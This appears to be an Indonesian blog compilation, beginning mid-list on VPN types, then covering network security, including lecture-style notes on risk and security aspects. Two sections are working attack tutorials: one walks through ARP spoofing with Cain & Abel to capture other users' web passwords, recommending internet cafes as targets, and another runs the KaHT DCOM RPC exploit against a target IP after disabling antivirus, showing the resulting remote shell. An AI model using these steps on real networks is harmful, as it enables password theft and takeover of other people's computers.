Secara harfiah, client-initiated merupakan pihak klien yang berinisiatif untuk melakukan sesuatu. Pada VPN jenis ini, ketika sebuah komputer ingin membangun koneksi VPN maka PC tersebutlah yang berusaha membangun tunnel dan melakukan  proses enkripsi hingga mencapai tujuannya dengan aman. Namun, proses ini tetap mengandalkan jasa dari jaringan Internet Service Provider (ISP) yang dapat digunakan untuk umum. Clien-initiated digunakan oleh komputer-komputer umum dengan mengandalkan VPN server atau VPN concentrator pada jaringan tujuannya.

5. Network Access Server-initiated

Berbeda dengan clien-initiated, VPN jenis network access server-initiated ini tidak mengharuskan clien untuk membuat tunnel dan melakukan enkrpsi dan dekripsi sendiri. VPN jenis ini hanya mengharuskan user melakukan dial-in ke network access server (NAS) dari ISP. Kemudian, NAS tersebut yang membangun tunnel menuju ke jaringan private yang dituju oleh klien tersebut. Dengan demikian, koneksi VPN dapat dibangun dan dipergunakan oleh banyak klien dari manapun, karena pada umumnya NAS milik ISP tersebut memang dibuka untuk umum.


Keamanan Jaringan Komputer

Dua minggu terakhir antara April dan Mei 2004, komunitas TI Indonesia diguncang berita tertangkapnya pembobol situs KPU oleh pihak kepolisian yang dimotori oleh tim ahli Teknologi Informasi KPU. Berita ini sebetulnya tidakterlalu hebat jika tidak bernuansa politis, karena pembobolan situs memang sudah dilakukan berkali-kali oleh anak-anak muda genius yang dengan bangganya dapat menayangkan inspirasi mereka untuk diketahui semua orang.
Pembobolan situs atau web server sebetulnya tergolong teknik tradisional, karena belakangan ini muncul teknik-teknik yang mampu mengobrak-abrik jaringan komputer atau Internetdengan cara yang lebih canggih dan tidak terpikirkan sebelumnya. Terjadinya pembobolan situs atau perusakan sistem memang akan terus terjadi, karena seperti halnya kehidupan di dunia ini, selalu berlomba antara polisi dan pencuri.
Kalau kita lihat ke proses pembobolan situs KPU, yang salah adalah tim ahli TI KPU yang tidak sigap menutup semua lubang yang memungkinkan masuknya pembobol, karena pada kenyataannya keamanan suatu sistem itu tergantung pada manusia yang menjaga dan mengoperasikan sistem tersebut, bukan melulu kesalahan di perangkat atau si pembobolnya. Dari data Computer Security Institute yaitu lembaga binaan FBI di Amerika, 71% serangan ke dalam sistem jaringan komputer terjadi dari dalam. Artinya, yang menyebabkan orang luar dapat masuk ke sistem adalah kelalaian dari dalam sendiri, baik karena tidak melakukan pembaharuan sistem (patching) atau mengganti password secara berkala.

Pengenalan Dasar Jaringan Komputer

Membobol Password Situs Web

Contoh kali ini mengenai bagaimana membobol password seseorang jika seseorang itu menuliskan password yang mana komputer yang dia pakai masih dalam satu LAN yang sama dengan sang penyerang.
Sebelumnya, Saya akan menjelaskan terlebih dahulu bahwa dalam contoh kasus kali ini Saya menggunakkan konfigurasi jaringan seperti ini:
Pada contoh kasus kali ini kita akan memanfaatkan kelemahan dari sistem jaringan yang disebut ARP Spoofing. Singkatnya, peracunan ARP ini akan membuat data mengalihkan data kiriman ke komputer penyerang. Misalnya, pada ilustrasi di atas terlihat jaringan LAN yang terdiri dari 2 komputer. Harusnya, jika data mau dikirimkan ke internet, maka data itu ya langsung dikirimkan ke internet tanpa embel-embel apa pun (kecuali switch). Namun, jika komputer penyerang mengirimkan racun ARP ke korban, maka korban akan dibegoin. Setiap data yang dikirimkan dari korban, maka akan mampir dulu di komputer penyerang.
Untuk mengirimkan racun-racun ini, kita bisa menggunakan perangkat lunak bernama Cain ‘n Abel. Untuk mengunduhnya, Anda dapat langsung mengunjungi situsnya. Setelah diunduh Anda dapat langsung memasangnya seperti halnya memasang perangkat lunak lainnya.
Setelah selesai dipasang (diinstall), mulailah melakukan hacking. Sekarang buka program Cain tersebut dan melakukan langkah-langkah berikut ini.
1. Aktifkan Sniffing (pengintipan data) dan ARP Poisinoing. Caranya dapat Anda lihat pada screenshot di bawah. Jika diminta memilih kartu jaringan, maka pilihlah adapter jaringan yang Anda pakai. Terkadang akan terdeteksi 2 adapter jaringan atau bahkan lebih. Untuk memilih yang mana yang benar, Anda bisa coba-coba memilih salah satu di antaranya dan langsung ke langkah selanjutnya. Jika langkah berikutnya tidak bekerja, cukup ganti lewat menu Configure. Sebagai informasi, adapter YANG PASTI SALAH jika ada kata DIALUP (karena ini modem dan bukan kartu jaringan).
Mengaktifkan Sniffing dan ARP.
2. Buka tabulasi sniffer, klik pada kotak kosong, klik tambah, lalu klik OK. Biarkan dia loading dan Anda akan melihat daftar komputer yang ada pada subnet yang sama. Anda tak perlu mengerti subnet itu apa, cukup ke langkah selanjutnya.
Menampilkan daftar komputer.
Mengaktifkan Sniffing dan ARP.
3. Klik pada tabulasi Sniffer, lalu ke APR, lalu klik kotak kosong bagian atas, lalu klik tombol tambah.
Memulai meracuni dengan ARP
4. Kemudian akan muncul kotak dialog pemilihan “pembodohan rute data”. Di sini Anda harus memilih antara alamat IP komputer korban dan alamat IP node pusat. Untuk mengetahui alamat IP komputer korban, Anda harus nebak atau langsung ngecek di komputer korbannya. Untuk mengetahui alamat IP, pergi ke Start > Run > cmd > ENTER > ipconfig /all > ENTER. Setelah itu Anda akan melihat tampilan kira-kira seperti ini:
C:\Users\Mufid>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : fidz-vista
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : SiS 900-Based PCI Fast Ethernet Adapter
Physical Address. . . . . . . . . : 00-E0-18-AC-C4-8B
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : 00-E0-18-AC-C4-8B
IP Address. . . . . . . . . . . . : 192.168.1.6 (INI ALAMAT KORBAN)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1 (INI NODE PUSATNYA)
DHCP Server . . . . . . . . . . . : 192.168.1.1
Karena itu, langsung saja lakukan penyadapan data antara alamat IP komputer korban dan alamat IP node pusat. Sebagai tambahan, node pusat komputer korban dan komputer penyerang adalah sama. Setelah selesai Anda dapat lihat penyadapan telah dimulai!
5. Sekarang semua password yang diketikan di halaman web manapun di komputer korban akan terbaca di komputer penyerang!
6. Mari kita tes. Saya buka situs web Friendster di komputer korban.
Membuka situs web Friendster untuk menguji keampuhan racun-racun ini!
7. Lalu kembali ke komputer penyerang. Pergi ke tabulasi Passwords, lalu pilih HTTP dan geser daftar ke bawah. Wuuhuu Anda melihat passwordnya sekarang! Perlu diketahui, daftar ini diupdate secara real-time. Jadi setiap password yang dikirimkan lewat halaman web, akan muncul di komputer penyerang tanpa harus mengklik tombol REFRESH (karena memang tidak ada :p)
Lihatlah password-password itu terbongkar!
Dan itulah bagaimana cara melakukan hackingnya. Trik ini sangat efektif jika dilakukan di warnet, karena di situ banyak password berterbaran.
Apakah ada cara perlindungannya? Tentu saja ada. Tapi caranya cenderung agak ribet dan gak’ simpel. Saran Saya, lebih baik Anda menggunakan komputer yang terjamin keamanannya. Di rumah, misalnya. Meski begitu, sudah ada beberapa situs web yang mengenkripsi password sebelum dikirim. Sehingga, walau password dapat disadap, password itu tidak berarti apa-apa.


Membobol Password Jaringan

Artikel ini bukan bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara membobol password komputer orang lain, tapi hanya sekedar mengingatkan kepada anda terutama bagi administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.
kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135, yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.
Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools KahT.
Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
Langkahnya :
1. Unzip file Kaht.zip
2. Letakkan pada direktori yang anda suka.
3. Masuk ke direktori tempat file berada melalui text mode
4. Tentukan sasaran pc yang akan di hacking missal
IP : 192.168.30.3
Kaht 192.168.30.1 192.168.30.3
Jika hacking anda berhasil akan tampil pada command line kira-kira sbb:
KAHT II – MASSIVE RPC EXPLOIT dst
[+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
[+] Attacking Port:135. Remote Shell at port:36388
[+] Scan In Progress……
- Connecting to 192.168.30.3
Sending Exploit to a [Win2k] Server
- Connectando con la Shell Remote
dst……..
C:WINNTsystem32>
Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai. anda bisa membuat user admin membuat sharing dll
Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan.


Pengenalan Keamanan Jaringan Komputer

Artikel Keamanan Jaringan ini didedikasikan untuk memenuhi tugas mata kuliah Keamanan Jaringan Komputer.
Di dalam posting tentang pengenalan keamanan jaringan ini terbagi menjadi 3 bagian, yaitu : Keamanan dan Manajemen Perusahaan, Klasifikasi Kejahatan Komputer, dan Aspek dari Kemanan Jaringan. dan kita akan membahas semuanya satu persatu..
Keamanan Dan Manajemen Perusahaan
Seringkali sulit untuk membujuk manajemen perusahaan atau pemilik sistem informasi untuk melakukan investasi di bidang keamanan. Di tahun 1997 majalah Information Week melakukan survey terhadap 1271 system atau network manager di Amerika Serikat. Hanya 22% yang menganggap keamanan sistem informasi sebagai komponen sangat penting(“extremely important”). Mereka lebih mementingkan “reducing cost” dan “improving competitiveness” meskipun perbaikan sistem informasi setelah dirusak justru dapat menelan biaya yang lebih banyak.
Keamanan itu tidak dapat muncul demikian saja. Dia harus direncanakan. Ambil contoh berikut. Jika kita membangun sebuah rumah, maka pintu rumah kita harus dilengkapi dengan kunci pintu. Jika kita terlupa memasukkan kunci pintu pada budget perencanaan rumah, maka kita akan dikagetkan bahwa ternyata harus keluar dana untuk menjaga keamanan.
Pengelolaan terhadap keamanan dapat dilihat dari sisi pengelolaan resiko (riskmanagement). Lawrie Brown dalam menyarankan menggunakan “Risk Management Model” untuk menghadapi ancaman (managing threats). Ada tiga komponen yang memberikan kontribusi kepada Risk, yaitu :
1. Assets terdiri dari hardware, software, dokumnentasi, data, komunikasi, lingkungan dan manusia.
2. Threats (ancaman) terdiri dari pemakai (users), teroris, kecelakaan, carakcers, penjahat, kriminal, nasib, (acts of God), intel luar negeri (foreign intellegence)
3. Vulneribalities (kelemahan) terdiri dari software bugs, hardware bugs, radiasi, tapping, crostalk, cracker via telepon, storage media.
Untuk menanggulangi resiko (Risk) tersebut dilakukan apa yang disebut “countermeasures”. yang dapat berupa :
* Mengurangi Threat, dengan menggunakan antivirus.
* Mengurangi Vulnerability, dengan meningkatkan security atau menambah firewall.
* Usaha untuk mengurangi impak (impact). yang ini kurang ngerti nih..klo ada yang tau komen di posting ini dong. :)
* Mendeteksi kejadian yang tidak bersahabat (hostile event) misalnya pop up. jadi kita antisipasi dengan popup blocker. atau misalnya spyware kita atasi dengan antispyware.
* Kembali (recover) dari kejadian, dengan system recovery atau tools-tools recovery lainnya.
Klasifikasi Kejahatan Komputer
Kalo kita bicara masalah kejahatan komputer pasti banyak sekali macamnya, karena itu gw menuliskan klasifikasi kejahatan komputer agar mudah kita mengenali dan membedakan model-model kejahatan komputer. Klasifikasi kali ini dibedakan berdasarkan lubang kemanan yang dibedakan menjadi 4 (empat) yaitu :
-> Kemanan yang bersifat fisik (Phisycal Security), Adalah Lubang keamanan yang bersifat fisik artinya bisa tersentuh seperti akses orang ke gedung, peralatan, dan media yang digunakan.
Beberapa contoh kejahatan komputer yang bisa diakses dari lubang keamanan yang bersifat fisik :
1. Wiretapping, adalah istilah untuk penyadapan saluran komunikasi khususnya jalur yang menggunakan kabel. misalnya penyadapan Telpon, Listrik, dan atau Internet.
2. Denial of Service, aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Denial of Service dapat dilakukan dengan cara mematikan peralatan atau membanjiri saluran komunikasi dengan permintaan yang menyebabkan jaringan menjadi sibuk, sistem hang, bandwidth habis, ram terkuras.
3. Pencurian, yang jelas merupakan bentuk kejahatan fisik karena mengambil alih peralatan / media.
-> Keamanan yang Berhubungan dengan Orang (personel), Lubang keamanan yang berkaitan dengan hak akses berdasarkan. Contohnya seorang user yang memanipulasi hak aksesnya menjadi administrator.
-> Keamanan dari Data dan Media serta Teknik Komunikasi (Comunication), Lubang keamanan yang terletak pada media. Misalnya Kelemahan Software yang digunakan untuk mengelola data.
-> Keamanan dalam Kebijakan Operasi (Policy), Lubang keamanan yang terletak pada kebijakan yang digunakan untuk mengatur dan mengelola sistem.
Aspek dari Keamanan Jaringan
Garfinkel mengemukakan bahwa keamanan computer (computer security) melingkupi beberapa aspek, yaitu :
1. Privacy / Confidentiality
Inti utama aspek privacy atau confidentiality adalah usaha untuk menjaga informasi dari orang yang tidak berhak mengakses. Privacy lebih ke arah data-data yang sifatnya privat sedangkan confidentiality biasanya berhubungan dengan data yang diberikan ke pihak lain untuk keperluan tertentu (misalnya sebagai bagian dari pendaftaran sebuah servis) dan hanya diperbolehkan untuk keperluan tertentu tersebut.
2. Integrity
Aspek ini menekankan bahwa informasi tidak boleh diubah tanpa seijin pemilik informasi. Adanya virus, Trojan horse, atau pemakai lain yang mengubah informasi tanpa ijin merupakan contoh masalah yang harus dihadapi. Sebuah email dapat saja “ditangkap” (intercept) di tengah jalan, diubah isinya (altered, tampered, modified), kemudian diterukan ke alamat yang dituju. Dengan kata lain, integritas dari informasi sudah tidak terjaga. Penggunaan enkripsi dan digital signature, misalnya dapat mengatasi masalah ini.
3. Authentication
Aspek ini berhubungan dengan metoda untuk menyatakan bahwa informasi betul-betul asli, orang yang mengakses atau memberikan informasi adalah betul-betul orang yang dimaksud, atau server yang kita hubungi adalah betul-betul server yang asli.
Untuk membuktikan keaslian dokumen dapat dilakukan dengan teknologi watermarking dan digital signature. Sedangkan untuk menguji keaslian orang atau server yang dimaksud bisa dilakukan dengan menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya. Ada tiga hal yang dapat ditanyakan kepada orang untuk menguji siapa dia :
* What you have (misalnya kartu identitas ~KTP,SIM,dll~)
* What you know (misalnya PIN atau password)
* What you are (misalnya sidik jari, biometric)
4. Availability
Aspek availability atau ketersedia hubungan dengan ketersediaan informasi ketika dibutuhkan. Sistem informasi yang diserang dapat menghambat atau meniadakan akses ke informasi. Contoh hambatan adalah serangan yang sering disebut dengan “Denial of Service attack” (DoS attack), dimana server dikirimi permintaan (biasanya palsu) yang bertubi-tubi atau permintaan diluar perkiraan sehingga tidak dapat melayani permintaan lain atau bahkan sampai down, hang, crash. Contoh lain adanya mailbomb, dimana seorang pemakai dikirimi email bertubi-tubi dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka emailnya atau kesulitan mengakses emailnya.
5. Akses Kontrol
Aspek kontrol merupakan fitur-fitur keamanan yang mengontrol bagaimana user dan sistem berkomunikasi dan berinteraksi dengan system dan sumberdaya yang lainnya. Akses kontrol melindungi sistem dan sumberdaya dari akses yang tidak berhak dan umumnya menentukan tingkat otorisasi setelah prosedur otentikasi berhasil dilengkapi.
Kontrol akses adalah sebuah term luas yang mencakup beberapa tipe mekanisme berbeda yang menjalankan fitur kontrol akses pada sistem komputer, jaringan, dan informasi. Kontrol akses sangatlah penting karena menjadi satu dari garis pertahanan pertama yang digunakan untuk menghadang akses yang tidak berhak ke dalam sistem dan sumberdaya jaringan.
6. Non-Repudiation
Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi. Penggunaan digital signature, certificates, dan teknologi kriptografi secara umum dapat menjaga aspek ini. Akan tetapi hal ini masih harus didukung oleh hukum sehingga status dari digital signature itu jelas legal.